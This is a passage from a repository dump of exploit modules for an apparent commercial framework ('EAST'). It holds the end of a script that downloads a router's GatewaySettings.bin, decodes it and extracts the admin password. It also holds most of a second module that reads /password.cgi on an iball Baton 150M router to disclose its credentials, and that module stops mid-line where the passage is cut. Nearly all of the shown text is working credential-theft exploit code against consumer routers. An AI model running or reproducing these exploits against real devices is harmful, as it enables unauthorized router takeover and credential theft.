self.make_url('/view/basic/GatewaySettings.bin') 53 | try: 54 | fd = urllib2.urlopen(url) 55 | content = fd.read() 56 | except Exception as e: 57 | self.log(e) 58 | self.finish(False) 59 | 60 | result = base64.b64decode(content[96:]).decode('ascii','ignore').replace('^@','') 61 | second = result.split('admin')[1] 62 | lpass = int(struct.unpack('>h', second[:2])[0]) 63 | 64 | self.log('Found credentials: admin:' + second[2:lpass + 2]) 65 | self.log('Config file saved to OUTPUT directory') 66 | self.writefile(result) 67 | 68 | self.finish(True) 69 | 70 | if __name__ == '__main__': 71 | """ 72 | By now we only have the tool mode for exploit.. 73 | Later we would have standalone mode also. 74 | """ 75 | print "Running exploit %s .. " % INFO['NAME'] 76 | e = exploit("192.168.0.1", 80) 77 | e.run() 78 | 79 | -------------------------------------------------------------------------------- /exploits/efa_iball_batton_150m_cd.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import urllib2 7 | from time import sleep 8 | 9 | sys.path.append("./core") 10 | from Sploit import Sploit 11 | 12 | INFO = {} 13 | INFO['NAME'] = "efa_iball_batton_150m_cd" 14 | INFO['DESCRIPTION'] = "iball Baton 150M Password Disclosure" 15 | INFO['VENDOR'] = "http://www.iball.co.in" 16 | INFO['DOWNLOAD_LINK'] = '' 17 | INFO['LINKS'] = ['https://packetstormsecurity.com/files/141522/iball-Baton-150M-Password-Disclosure.html'] 18 | INFO["CVE Name"] = "" 19 | INFO["NOTES"] = """iball Baton 150M Router's login page is insecurely developed that any attacker could bypass the admin's authentication just by tweaking the password.cgi file. 20 | Firmware Version : 1.2.6 build 110401 Rel.47776n 21 | Hardware Version : iB-WRA150N v1 00000001 22 | """ 23 | 24 | INFO['CHANGELOG'] = "10 Mar, 2017. Written by Gleg team." 25 | INFO['PATH'] = 'Exploits/Hardware/' 26 | 27 | # Must be in every module, to be set by framework 28 | OPTIONS = {} 29 | OPTIONS["HOST"] = "172.20.174.1", dict(description = 'Target IP') 30 | OPTIONS["PORT"] = 80, dict(description = 'Target port') 31 | 32 | class exploit(Sploit): 33 | def __init__(self, host="", port=0, logger=None): 34 | Sploit.__init__(self, logger = logger) 35 | self.name = INFO['NAME'] 36 | self.port = port 37 | self.host = host 38 | 39 | def args(self): 40 | self.args = Sploit.args(self, OPTIONS) 41 | self.host = self.args.get('HOST', self.host) 42 | self.port = int(self.args.get('PORT', self.port)) 43 | 44 | 45 | def make_url(self, path = ''): 46 | return 'http://{}:{}{}'.format(self.host, self.port, path) 47 | 48 | def run(self): 49 | self.args() 50 | 51 | url = self.make_url('/password.cgi') 52 | try: 53 | fd = urllib2.urlopen(url) 54 | source = fd.read() 55 | result = source.split('